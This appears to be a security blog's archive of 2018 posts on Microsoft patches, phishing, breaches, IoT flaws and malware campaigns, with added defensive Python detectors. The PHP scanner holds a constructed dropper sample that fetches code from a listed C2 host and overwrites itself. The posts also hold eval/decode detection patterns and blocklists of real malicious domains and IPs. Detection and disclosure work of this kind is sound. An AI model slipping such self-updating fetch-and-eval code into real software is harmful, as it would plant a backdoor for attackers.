Author Archives: Duncan Newell

About Duncan Newell

Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Microsoft Patch Tuesday – June 2018

Microsoft has released its monthly security advisories for vulnerabilities that have been identified and addressed in various Microsoft products. This month’s advisory release addresses 50 flaws, with 11 of them rated “critical,” and 39 rated “important.” These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more.

In addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the corresponding Adobe security bulletin.

Critical Vulnerabilities

This month, Microsoft is addressing 11 vulnerabilities that are rated “critical.” Talos believes these three vulnerabilities in particular are notable and require prompt attention.

CVE-2018-8225 – Windows DNSAPI Remote Code Execution Vulnerability

A remote code execution vulnerability is present within Windows DNS. It exists because DNSAPI.dll improperly handles DNS responses, and it could allow a remote attacker to execute arbitrary code in the context of the LocalSystem account on affected systems. An attacker could trigger it by using a malicious DNS server to send specially crafted DNS responses to the target; no user interaction is needed beyond the client issuing a DNS query.

CVE-2018-8229 – Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

CVE-2018-8267 – Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the scripting engine not properly handling objects in memory in Internet Explorer. It could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed before a patch was made available, so it should be prioritised.

Other vulnerabilities deemed “critical” are listed below:

Important vulnerabilities

This month, Microsoft is addressing 39 vulnerabilities that are rated “important.” One of these vulnerabilities is TALOS-2018-0545, which was assigned CVE-2018-8210. This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. Additional information related to this vulnerability can be found in the advisory report here.

Additionally, Talos believes the following vulnerability is notable and requires prompt attention.

CVE-2018-8227 – Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

Other vulnerabilities deemed “important” are listed below:






What Is msftconnecttest.com ?

You have found this web page because you want to know what the domain msftconnecttest.com is and who owns it.

We can confirm this domain is used by Windows 10 and later to test whether the machine has a working Internet connection.

Windows has an internal component that detects network connectivity changes, the Network Connectivity Status Indicator (NCSI). Among other tasks, NCSI performs a background probe to determine whether the machine has Internet connectivity, and works with the Network Location Awareness (NLA) service to identify whether the machine is on a domain or a public network so that the correct firewall profile is applied.

There are two domains associated with these connectivity checks: msftconnecttest.com (Windows 10 and later) and msftncsi.com (Windows 8.1 and earlier). Both are contacted over plain HTTP, so an egress proxy or firewall that blocks or rewrites them will make Windows report "No Internet access" or a captive portal.




Fake TSB Account Emails

There are a lot of fake TSB e-mails going around at the moment; here are the details of one we received today. We had two of these e-mails two hours apart and both reached our inbox despite good spam protection, so some effort has gone into making this e-mail bypass spam filters. There are no obvious spelling or grammar errors in it.

In our copy the subject was "TSB" and the from address was [email protected]. The link they wanted you to click was iiinin.com/sign-in.php, which then redirected to another URL on the domain wlengineering.co.za hosting a fake login page. The aim is to capture your login details.

The text of the e-mail said: "Due to several failed attempts to access your online Account . We temporarily de-activated your account access. To your Protection you have to Verify Your Identity . To confirm your account

Fake TSB login page




Fake TSB email
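The checks a mail filter or an analyst would run on a message like this, as an added example that is not part of the original post: parse the e-mail, pull every anchor out of the HTML body, and flag links and senders whose registrable domain is not one the bank owns. The two messages are constructed (the first mirrors the one described above, including the iiinin.com link; the second is what a genuine notification would look like), the sender addresses are made up, and LEGIT_DOMAINS and the short public-suffix list are assumptions for the example.

```python
"""Link triage for a suspected bank-phishing e-mail (added example)."""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND = "tsb"
LEGIT_DOMAINS = {"tsb.co.uk"}   # assumption: the bank's own registrable domains
# Assumption: a tiny stand-in for the public suffix list, enough for this example.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "co.za", "com.au"}

# Constructed message modelled on the phishing e-mail described above.
PHISH_EML = """\
From: TSB <alerts@example.net>
Subject: TSB
Content-Type: text/html; charset=utf-8

<html><body>
<p>Due to several failed attempts to access your online Account. We temporarily
de-activated your account access. To your Protection you have to Verify Your Identity.</p>
<p><a href="http://iiinin.com/sign-in.php">To confirm your account</a></p>
</body></html>
"""

# Constructed message showing what a genuine notification would look like.
GENUINE_EML = """\
From: TSB <noreply@tsb.co.uk>
Subject: Your statement is ready
Content-Type: text/html; charset=utf-8

<html><body><p><a href="https://www.tsb.co.uk/">Log in</a> to view it.</p></body></html>
"""


class LinkCollector(HTMLParser):
    """Collect href values of every <a> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def registrable_domain(host):
    """Strip subdomains: www.tsb.co.uk -> tsb.co.uk, a.b.example.com -> example.com."""
    labels = host.lower().rstrip(".").split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def triage(raw):
    """Return the sender, the links found and a sorted list of finding names."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    _, sender = parseaddr(msg["From"] or "")
    sender_domain = registrable_domain(sender.rsplit("@", 1)[-1]) if "@" in sender else ""
    claims_brand = BRAND in (msg["From"] or "").lower() or BRAND in (msg["Subject"] or "").lower()
    if claims_brand and sender_domain not in LEGIT_DOMAINS:
        findings.append("sender-domain-not-brand")

    collector = LinkCollector()
    collector.feed(msg.get_content())
    for link in collector.links:
        parsed = urlparse(link)
        # The display text says "confirm your account"; only the href tells the truth.
        if registrable_domain(parsed.hostname or "") not in LEGIT_DOMAINS:
            findings.append("link-domain-not-brand")
        if parsed.scheme == "http":
            findings.append("link-not-https")
    return {"sender": sender, "links": collector.links, "findings": sorted(set(findings))}


if __name__ == "__main__":
    for label, raw in (("phish", PHISH_EML), ("genuine", GENUINE_EML)):
        print(label, triage(raw)["findings"])
```

The redirect from iiinin.com to wlengineering.co.za only shows up once the link is followed, so this triage stops at the first hop; fetching the chain belongs in a sandbox, not in the mail pipeline.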


What Is msftncsi.com ?

You have found this web page because you want to know what the domain msftncsi.com is and who owns it.

We can confirm this domain is used by Windows 8.1 and earlier to test whether the machine has a working Internet connection.

Windows has an internal component that detects network connectivity changes, the Network Connectivity Status Indicator (NCSI). Among other tasks, NCSI performs a background probe to determine whether the machine has Internet connectivity, and works with the Network Location Awareness (NLA) service to identify whether the machine is on a domain or a public network so that the correct firewall profile is applied.

There are two domains associated with these connectivity checks: msftconnecttest.com (Windows 10 and later) and msftncsi.com (Windows 8.1 and earlier). Both are contacted over plain HTTP, so an egress proxy or firewall that blocks or rewrites them will make Windows report "No Internet access" or a captive portal.
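How the probe behind both the msftconnecttest.com and msftncsi.com posts reaches its verdict, as an added example written for this page rather than Microsoft's code. The host names, paths and expected bodies are the Windows defaults (the ActiveWebProbeHost, ActiveWebProbePath and ActiveWebProbeContent values under the NlaSvc\Parameters\Internet registry key) plus the dns.msftncsi.com lookup; the HTTP fetcher and DNS resolver are injected so the logic runs offline against constructed responses, and the three-state outcome is a simplification of NCSI's real state machine.

```python
"""Offline model of the Windows NCSI active probe (added example)."""
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Probe:
    host: str
    path: str
    expected_body: str


# Windows 10 and later (ActiveWebProbeHost / ActiveWebProbePath / ActiveWebProbeContent)
WIN10_PROBE = Probe("www.msftconnecttest.com", "/connecttest.txt", "Microsoft Connect Test")
# Windows 8.1 and earlier
LEGACY_PROBE = Probe("www.msftncsi.com", "/ncsi.txt", "Microsoft NCSI")
# DNS half of the probe: this name must resolve to exactly this address.
DNS_PROBE_HOST = "dns.msftncsi.com"
DNS_PROBE_ANSWER = "131.107.255.255"

# Host/path pairs an egress proxy should expect (and allow) from Windows clients.
NCSI_PROBE_URLS = {
    ("www.msftconnecttest.com", "/connecttest.txt"),
    ("ipv6.msftconnecttest.com", "/connecttest.txt"),
    ("www.msftncsi.com", "/ncsi.txt"),
}


@dataclass(frozen=True)
class HttpResult:
    status: int
    body: str


Fetcher = Callable[[str, str], Optional[HttpResult]]  # (host, path) -> response, None if unreachable
Resolver = Callable[[str], Optional[str]]             # name -> A record, None if lookup failed


def classify_connectivity(probe: Probe, fetch: Fetcher, resolve: Resolver) -> str:
    """Return "internet", "captive-portal" or "no-connectivity" (simplified NCSI)."""
    answer = resolve(DNS_PROBE_HOST)
    result = fetch(probe.host, probe.path)

    if answer is None and result is None:
        return "no-connectivity"

    # The probe is plain HTTP, so the only integrity check is an exact body
    # comparison. Anything else (a hotspot login page, a redirect, a proxy
    # block page) means something is sitting between the client and the Internet.
    http_ok = (result is not None and result.status == 200
               and result.body.strip() == probe.expected_body)
    dns_ok = answer == DNS_PROBE_ANSWER
    return "internet" if http_ok and dns_ok else "captive-portal"


def is_ncsi_probe(host: str, path: str) -> bool:
    """True for requests an egress filter should let through unmodified."""
    return (host.lower(), path) in NCSI_PROBE_URLS


# --- constructed network conditions ------------------------------------------

def working_fetch(host, path):
    """Constructed: the real bodies for the two probe URLs, 404 for anything else."""
    bodies = {
        ("www.msftconnecttest.com", "/connecttest.txt"): "Microsoft Connect Test",
        ("www.msftncsi.com", "/ncsi.txt"): "Microsoft NCSI",
    }
    body = bodies.get((host, path))
    return HttpResult(200, body) if body is not None else HttpResult(404, "")


def portal_fetch(host, path):
    """Constructed: a hotspot that answers every HTTP request with its login page."""
    return HttpResult(200, "<html><body>Please log in to continue</body></html>")


def honest_resolve(name):
    return DNS_PROBE_ANSWER if name == DNS_PROBE_HOST else None


def portal_resolve(name):
    """Constructed: portal DNS that points every name at the gateway."""
    return "10.0.0.1"


def offline(*_):
    return None


if __name__ == "__main__":
    for label, fetch, resolve in [("normal", working_fetch, honest_resolve),
                                  ("hotspot", portal_fetch, portal_resolve),
                                  ("cable out", offline, offline)]:
        print(f"{label:10} -> {classify_connectivity(WIN10_PROBE, fetch, resolve)}")
```

Because the check is unauthenticated HTTP with a fixed expected body, anything on the path (a transparent proxy, a DNS filter, a mis-scoped block rule) flips every client into the captive-portal state; the usual fix is to allow-list exactly the host/path pairs in NCSI_PROBE_URLS rather than the whole domains.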





Hackers Access Almost 6 Million Bank Card Details At Dixons Carphone

Dixons Carphone has said that it has been the victim of an “unauthorised data access” in which millions of customer bank card details were targeted over the past 12 months.

The company believed there were attempts since last July – only discovered over the past week – to compromise 5.9 million cards in one of its processing systems for Currys PC World and Dixons Travel stores.

Dixons Carphone Warehouse says there has been no evidence of fraud as a result of the hack, but there are a few general tips below if you’re worried:

  • Regularly check your accounts. It’s good practice to regularly keep an eye on your bank accounts and credit card statements. If you spot anything unusual contact your provider immediately.
  • Watch out for scams. Be alert and watch out for potential scam emails or calls – don’t simply assume they are genuine even if they look believable.
  • Change your password. Dixons Carphone Warehouse doesn’t think any passwords were taken, but if you’re worried change your password, and change it on other sites where you have used the same one.

In a statement the company said :-

As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company. We promptly launched an investigation, engaged leading cyber security  experts and added extra security measures to our systems. We have taken action to close off this access and have no evidence it is continuing. We have no evidence to date of any fraudulent use of the data as result of these incidents. We have also informed the relevant authorities including the ICO, FCA and the police.

Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made. Approximately 105,000 non-EU issued payment cards which do not have chip and pin protection have been compromised. As a precaution we immediately notified the relevant card companies via our payment provider about all these cards so that they could take the appropriate measures to protect customers. We have no evidence of any fraud on these cards as a result of this incident.

Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.

Dixons Carphone Chief Executive, Alex Baldock, said:
“We are extremely disappointed and sorry for any upset this may cause. The protection of our data has to be at the heart of our business, and we’ve fallen short here. We’ve taken action to close off this unauthorised access and though we have currently no evidence of fraud as a result of these incidents, we are taking this extremely seriously. We are determined to put this right and are taking steps to do so; we promptly launched an investigation, engaged leading cyber security experts, added extra security measures to our systems and will be communicating directly with those affected. Cyber crime is a continual battle for business today and we are determined to tackle this fast-changing challenge.”





Foscam Camera Web Management Vulnerability (CVE-2018-6830)

Multiple Foscam cameras could allow a remote attacker to delete arbitrary files from the system, due to a flaw in the web management interface. By sending a specially crafted HTTP GET request, an attacker could exploit this vulnerability to delete arbitrary files from the camera's filesystem. Until a fix is available, the practical mitigation is to keep the web interface off the Internet and reachable only from a management network.

Affected products :-

Foscam FI9800P V3 2.82.2.33
Foscam FI9803P V4 2.84.2.33
Foscam FI9816P V3 2.81.2.33
Foscam FI9821EP V2 2.81.2.33
Foscam FI9821P V3 2.81.2.33
Foscam FI9826P V3 2.81.2.33
Foscam FI9831P V3 2.81.2.33

No remedy available as of June 6th 2018.





Operation Prowli Malware

An advanced malware campaign known as Operation Prowli has been observed targeting a variety of systems worldwide. Vulnerable platforms include content management systems (CMS), IoT devices and modems; with financial, industrial and governmental organisations affected worldwide.

The attackers behind Operation Prowli are focused on making money from their efforts rather than ideology or espionage.  The first source of revenue comes from cryptocurrency mining. Typically, cryptocurrency mining is considered a resource-heavy operation that involves a large upfront investment followed by ongoing traffic and energy costs. The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains.

Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.




The attackers behind Operation Prowli use a wide variety of bespoke malware tools and exploits to compromise systems. A worm called r2r2 scans for systems with publicly reachable SSH ports and performs brute-force attacks against them to gain access. It then downloads and installs a variant of the XMRig cryptocurrency miner before scanning for new targets.

Manual attacks are performed against CMS servers with the intention of re-purposing them to serve malicious files to users. Different payloads are delivered depending on the type of device visiting the compromised websites. Affected servers will also be used in malvertising, SEO fraud and traffic redistribution campaigns.

Further details regarding this can be found here – https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/

Domains / IPs To Block

startreceive[.]tk

stats.startreceive[.]tk (traffic redirection)

wp.startreceive[.]tk (C&C)

roi777[.]com

minexmr[.]com

185.212.128.154
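Two checks worth running against the r2r2 behaviour described above and the indicator list just given, as an added example written for this page (not Guardicore's tooling): a sliding-window count of sshd password failures per source, which also notices the successful password login that follows a burst, and a suffix match of egress destinations against the Prowli domains and IP. The sshd log lines and egress records are constructed; FAIL_THRESHOLD and WINDOW are assumptions to tune per environment.

```python
"""SSH brute-force detection plus Prowli indicator matching (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines: 203.0.113.7 is brute forced and then logged into with a
# guessed password; 198.51.100.9 is an admin with one typo and a key login.
SAMPLE_AUTH_LOG = """\
Jun  6 10:01:01 web1 sshd[1200]: Failed password for root from 203.0.113.7 port 51000 ssh2
Jun  6 10:01:03 web1 sshd[1201]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun  6 10:01:05 web1 sshd[1202]: Failed password for invalid user admin from 203.0.113.7 port 51004 ssh2
Jun  6 10:01:07 web1 sshd[1203]: Failed password for root from 203.0.113.7 port 51006 ssh2
Jun  6 10:01:09 web1 sshd[1204]: Failed password for root from 203.0.113.7 port 51008 ssh2
Jun  6 10:01:12 web1 sshd[1205]: Failed password for root from 203.0.113.7 port 51010 ssh2
Jun  6 10:01:20 web1 sshd[1210]: Failed password for deploy from 198.51.100.9 port 40000 ssh2
Jun  6 10:01:25 web1 sshd[1211]: Accepted publickey for deploy from 198.51.100.9 port 40001 ssh2
Jun  6 10:01:30 web1 sshd[1260]: Accepted password for root from 203.0.113.7 port 51070 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)
FAIL_THRESHOLD = 5            # assumption: failures inside WINDOW before a source is flagged
WINDOW = timedelta(seconds=60)


def parse_line(line, year=2018):
    """Parse one syslog-format sshd line; syslog omits the year, so it is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "outcome": m["outcome"], "method": m["method"],
            "user": m["user"], "src": m["src"]}


def find_bruteforce(log_text):
    """Return {src: {"failures": n, "success_after": bool}} for sources that exceed
    FAIL_THRESHOLD password failures inside WINDOW."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    flagged = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        if ev["outcome"] == "Failed":
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > WINDOW:
                q.popleft()
            if len(q) >= FAIL_THRESHOLD:
                flagged.setdefault(ev["src"], {"failures": 0, "success_after": False})
                flagged[ev["src"]]["failures"] = len(q)
        elif ev["src"] in flagged and ev["method"] == "password":
            # A password login right after a burst is the r2r2 pattern: the worm
            # guessed a credential and will now fetch the miner.
            flagged[ev["src"]]["success_after"] = True
    return flagged


# Indicators from the post (defanged in the text above).
PROWLI_DOMAINS = {"startreceive.tk", "roi777.com", "minexmr.com"}
PROWLI_IPS = {"185.212.128.154"}


def matches_ioc(dst_host, dst_ip):
    """Exact IP match, or the host equals an indicator domain or is a subdomain of one."""
    if dst_ip in PROWLI_IPS:
        return True
    host = dst_host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in PROWLI_DOMAINS)


# Constructed egress records: (src, dst_host, dst_ip, dst_port). Addresses other
# than the listed indicator are documentation ranges.
SAMPLE_EGRESS = [
    ("10.0.0.5", "wp.startreceive.tk", "198.51.100.20", 80),
    ("10.0.0.5", "pool.minexmr.com", "198.51.100.21", 4444),
    ("10.0.0.7", "", "185.212.128.154", 443),
    ("10.0.0.6", "www.msftconnecttest.com", "198.51.100.99", 80),
]


def flag_egress(records):
    return [r for r in records if matches_ioc(r[1], r[2])]


if __name__ == "__main__":
    print("brute force:", find_bruteforce(SAMPLE_AUTH_LOG))
    print("egress hits:", flag_egress(SAMPLE_EGRESS))
```

The suffix match matters because the post lists both startreceive[.]tk and two of its subdomains; matching on the registrable domain catches any further subdomain the operators rotate to, while a plain string match on "startreceive.tk" would also hit unrelated names such as notstartreceive.tk.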




How To Update Windows 10

Windows 10 periodically checks for updates so you don’t have to. When an update is available, it’s automatically downloaded and installed, keeping your device up to date with the latest features.

Check Manually For Windows 10 Updates

To check for updates manually, select the Start button, and then go to Settings > Update & security > Windows Update, and select Check for updates. If Windows Update says your device is up to date, you have all the updates that are currently available.






Bootloader Protection Bypass Discovered On OnePlus 6

Jason Donenfeld, president of Edge Security LLC, also known on XDA as zx2c4, has discovered a vulnerability in the OnePlus 6 that allows an arbitrary modified boot image to be booted, bypassing bootloader protection measures (such as a locked bootloader).

Exploiting this vulnerability requires physical access to the device.


This vulnerability allows an attacker with physical access and a tethered connection to a PC to take control of the device. If the attacker boots a modified image with ADB enabled and running as root by default, that physical access gives them total control over the device.

In a statement, OnePlus says:

We take security seriously at OnePlus. We are in contact with the security researcher, and a software update will be rolling out shortly.

Story via – https://www.xda-developers.com





BabaYaga The New Russian WordPress Malware Used For SEO Spam

Security researchers have analysed a malware strain targeting WordPress sites that includes some clever techniques, such as removing competing malware and updating the victim's site.

Known as BabaYaga, this malware strain isn’t new, but recent updates have transformed this former low-key player into a considerable foe for WordPress site administrators.

The malware has two parts: one injects spam ads into the affected site, and the other is a backdoor through which the attackers retain full control of the infected site.

The malware is controlled by a central command and control server (C2 server) which allows the attacker to control thousands of sites and use them to generate affiliate revenue. This malware variant even goes to the trouble of reporting back to the C2 server how many pages of an infected site have been indexed by Google, Bing, Yahoo and Yandex, to determine the SEO value of an infected site.

The malware can access a certain URL on the C2 server and retrieve the newest variant of itself. Once it has downloaded the code, the malware runs a function to randomize variable and function names in order to avoid detection, and overwrites itself with the new code.

The malware appears to be Russian in origin. When its configuration file is decoded, at least one of the array keys is a transliteration of a Russian word for “backlink”. Many of the domains on the command and control servers are .ru domains. Some of the core domains are registered to an email address @yandex.ru

For a full detailed description of this malware click here

Command And Control Servers

7od.info (178.132.0.105)
my.wpssi.com (89.38.98.31)
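A file-content scan for the self-updating, name-randomising behaviour described above, as an added example written for this page (it is not the researchers' tooling). The only BabaYaga-specific indicators used are the two C2 host names listed; the other checks are generic heuristics for packed payloads, self-overwrite and machine-generated identifier names, which also fire on other PHP malware and occasionally on legitimate minified code, so the hit count is a triage score rather than proof. The three files are constructed, and RANDOM_NAME_MIN and the scoring threshold are assumptions.

```python
"""Heuristic scan of a WordPress tree for self-updating, obfuscated PHP (added example)."""
import re

C2_HOSTS = ("7od.info", "my.wpssi.com")   # the two C2 servers listed in the post

# (name, pattern) checks run against each file's source.
CHECKS = [
    ("c2-host", re.compile("|".join(re.escape(h) for h in C2_HOSTS))),
    # eval() fed straight from a decoder is the classic packed-payload shape
    ("eval-decode", re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    # a 200+ character base64 literal: packed code or an encoded config
    ("base64-blob", re.compile(r"""['"][A-Za-z0-9+/]{200,}={0,2}['"]""")),
    # the "download the newest variant and overwrite itself" behaviour
    ("self-overwrite", re.compile(r"file_put_contents\s*\(\s*__FILE__")),
    ("remote-fetch", re.compile(r"""(?:curl_init|file_get_contents)\s*\(\s*['"]https?://""")),
]
IDENT_RE = re.compile(r"\$([A-Za-z_]\w{7,})")
RANDOM_NAME_MIN = 5   # assumption: distinct machine-looking names before flagging


def looks_random(name):
    """Heuristic for randomised identifiers: letters and digits mixed, no word separators."""
    return any(c.isdigit() for c in name) and any(c.isalpha() for c in name) and "_" not in name


def scan_php(source):
    """Return the list of check names that matched this source, in CHECKS order."""
    hits = [name for name, rx in CHECKS if rx.search(source)]
    random_names = {n for n in IDENT_RE.findall(source) if looks_random(n)}
    if len(random_names) >= RANDOM_NAME_MIN:
        hits.append("random-names")
    return hits


def scan_tree(files, threshold=2):
    """files: {relative path: source}. Return {path: hits} for files at or above threshold."""
    report = {}
    for path, source in files.items():
        hits = scan_php(source)
        if len(hits) >= threshold:
            report[path] = hits
    return report


# Constructed sample tree: a dropper modelled on the behaviour described above, a
# clean config, and a legitimate file that happens to carry a large base64 asset.
PACKED = "QUFB" * 60   # 240 base64 characters of constructed filler
SAMPLE_FILES = {
    "wp-content/uploads/.cache/x.php": (
        "<?php\n"
        "$q7f3a9c1d2 = 'http://my.wpssi.com/u.php?v=';\n"
        "$z1c9d4e7f3 = md5(__FILE__);\n"
        "$m4a8b2c6e1 = $q7f3a9c1d2 . $z1c9d4e7f3;\n"
        "$b2e4f8a1c0 = file_get_contents('http://my.wpssi.com/u.php?v=' . $z1c9d4e7f3);\n"
        "$k9e3f7a2b5 = strlen($b2e4f8a1c0);\n"
        "if ($k9e3f7a2b5 > 0) { file_put_contents(__FILE__, $b2e4f8a1c0); }\n"
        'eval(base64_decode("' + PACKED + '"));\n'
    ),
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wordpress');\n$table_prefix = 'wp_';\n",
    "wp-content/plugins/gallery/icon.php": (
        '<?php\n$icon = "' + PACKED + '";\n'
        'header("Content-Type: image/png");\necho base64_decode($icon);\n'
    ),
}


if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Because the malware rewrites its own identifiers on every update, a scanner keyed on specific variable names goes stale immediately; the behavioural checks (a decoder inside eval, a write to __FILE__, a fetch from a hard-coded URL) survive the renaming, which is why they carry the score here and the C2 names are only one signal among several.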



